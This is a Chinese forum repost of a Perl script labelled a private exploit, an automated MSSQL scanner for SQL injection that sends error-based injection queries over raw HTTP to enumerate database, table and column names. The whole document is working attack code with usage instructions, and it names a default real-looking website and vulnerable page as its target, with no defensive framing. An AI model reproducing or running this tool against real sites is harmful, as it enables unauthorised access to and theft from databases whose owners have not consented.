来源:网络技术论坛
代码
复制内容到剪贴板
代码:
[color=red]
#!/usr/bin/perl
#Private Exploit!Don't distributed it!
$|=1;
use Socket;
use Getopt::Std;
getopt('hpwtdi');
$host=$opt_h || "[url]www.vod999.com[/url]";
$port=$opt_p || 80;
$path=$opt_w || "/movie_detail.asp?movie_m1id=1264";
$type=$opt_t || "table_scan";
$database=$opt_d;
$tab_id=$opt_i;
usage();
if($type eq "table_scan")
{
scan_db();
print "\nDatabase name scan complete!\n===================================\n";
foreach (@sqldb)
{
print "$_\n";
}
print "===================================\n";
scan_table(@sqldb);
for($i=0;$i<@sqldb;$i++)
{
print "\n\n============== $sqldb[$i] ==============\n\n";
@tb=split(/n/,$table_name[$i]);
@tbid=split(/n/,$table_id[$i]);
for($j=0;$j<@tb;$j++)
{
print "| $tb[$j]($tbid[$j])\t";
}
}
}
elsif(($type eq "column_scan") && ($database ne "") && ($tab_id ne ""))
{
scan_columns($database,$tab_id);
print "\n============== $database.dbo.$tab_id ==============\n\n";
foreach (@columns)
{
print "| $_\t";
}
}
sub sendraw {
my ($req) = @_;
my $target;
$target = inet_aton($host) || die("inet_aton problems\n");
socket(S,PF_INET,SOCK_STREAM,getprotobyname('tcp')||0) || die("Socket problems\n");
if(connect(S,pack "SnA4x8",2,$port,$target)){
select(S);
$| = 1;
print $req;
my @res = <S>;
select(STDOUT);
close(S);
return @res;
}
else {
die("Can't connect...\n");
}
}
sub scan_db()
{
my $i=7;
my $req,$get;
my $db=1;
my @res;
while($db ne "not found")
{
$get=$path."%20and%200<>(select%20count(*)%20from%20master.dbo.sysdatabases%20where%20name>1%20and%20dbid=$i)";
$req= make_request($get);
@res=sendraw($req);
$db=findstr(@res);
if($db ne "not found")
{
@sqldb=(@sqldb,$db);
}
$i++;
}
}
sub findstr
{
my @tmpres=@_;
my $tmpline;
my $s1,$s2,$s3;
foreach $tmpline (@tmpres)
{
if($tmpline=~/char 值.*转换/isg)
{
$s1=0;
$s2=0;
$s3=0;
($s1,$s2,$s3)=split(/'/,$tmpline);
$s2=~s/ //isg;
print ".";
if(length($s2) > 1)
{
return $s2;
}
}
}
return "not found";
}
sub scan_table
{
my @db=@_;
my $req,$get;
my $table=1;
my @res;
my $tmpstr1;
my $i=0;
my $tableid;
foreach $db_name (@db)
{
$tmpstr1="";
$table=1;
$get=$path."%20and%200<>(select%20top%201%20name%20from%20$db_name.dbo.sysobjects%20where%20xtype='U')";
$req= make_request($get);
@res=sendraw($req);
$table=findstr(@res);
$table_name[$i]=$table_name[$i]."$table\n";
$get=$path."%20and%200<>(select%20count(*)%20from%20$db_name.dbo.sysobjects%20where%20xtype='U'%20and%20name='$table'%20and%20uid>(str(id)))";
$req= make_request($get);
@res=sendraw($req);
$tableid=findstr(@res);
$table_id[$i]=$table_id[$i]."$tableid\n";
$tmpstr1="'$table'";
while($table ne "not found")
{
$get=$path."%20and%200<>(select%20top%201%20name%20from%20$db_name.dbo.sysobjects%20where%20xtype='U'%20and%20name%20not%20in($tmpstr1))";
$req= make_request($get);
@res=sendraw($req);
$table=findstr(@res);
if($table ne "not found")
{
$table_name[$i]=$table_name[$i]."$table\n";
$get=$path."%20and%200<>(select%20count(*)%20from%20$db_name.dbo.sysobjects%20where%20xtype='U'%20and%20name='$table'%20and%20uid>(str(id)))";
$req= make_request($get);
@res=sendraw($req);
$tableid=findstr(@res);
$table_id[$i]=$table_id[$i]."$tableid\n";
}
$tmpstr1=$tmpstr1.",'$table'";
}
print "\nDatabase \"$db_name\" scan complete!\n";
$i++;
}
}
sub scan_columns
{
my $this_db_name=shift;
my $this_table_id=shift;
my $get,$req,$tmpstr;
my @res;
$get=$path."%20and%200<>(select%20top%201%20name%20from%20$this_db_name.dbo.syscolumns%20where%20id=$this_table_id)";
$req= make_request($get);
@res=sendraw($req);
$column=findstr(@res);
@columns=(@columns,$column);
$tmpstr="'$column'";
while($column ne "not found")
{
$get=$path."%20and%200<>(select%20top%201%20name%20from%20$this_db_name.dbo.syscolumns%20where%20id=$this_table_id%20and%20name%20not%20in($tmpstr))";
$req= make_request($get);
@res=sendraw($req);
$column=findstr(@res);
if($column ne "not found")
{
@columns=(@columns,$column);
$tmpstr=$tmpstr.",'$column'";
}
}
}
sub make_request
{
my $getstr=shift;
my $reqstr;
$reqstr= "GET $getstr HTTP/1.0\r\n".
"HOST:$host\r\n\r\n";
return $reqstr;
}
sub usage
{
print qq~
===================================================
MSSQL Database Scanner for SQL Injection
Codz By Envymask<[email]envymask@ph4nt0m.net[/email]>
===================================================
Usage: $0 -h <Host> [-p <port>] -w <normal URL> -t <scan type> [-d <database name> -i <table id>]
-h =hostname you want to scan
-p =port,80 default
-w =the normal URL you request such as "/movie_detail.asp?movie_m1id=1264"
-t =scan type ,only accept "table_scan" and "column_scan"
-d =the database name you want to scan such as "movie",only selected "column_scan" can use this option
-i =the table id you want to scan such as "1568724641",you can get this id from table_scan,only selected "column_scan" can use this option
Eg: $0 -h <a href="[url]http://www.target.com[/url]" target="_blank">[url]www.target.com</a>[/url] -p 80 -w "/movie_detail.asp?movie_m1id=1264" -t table_scan
$0 -h <a href="[url]http://www.target.com[/url]" target="_blank">[url]www.target.com</a>[/url] -p 80 -w "/movie_detail.asp?movie_m1id=1264" -t column_scan -d movie -i 1568724641
~;
}[/color]
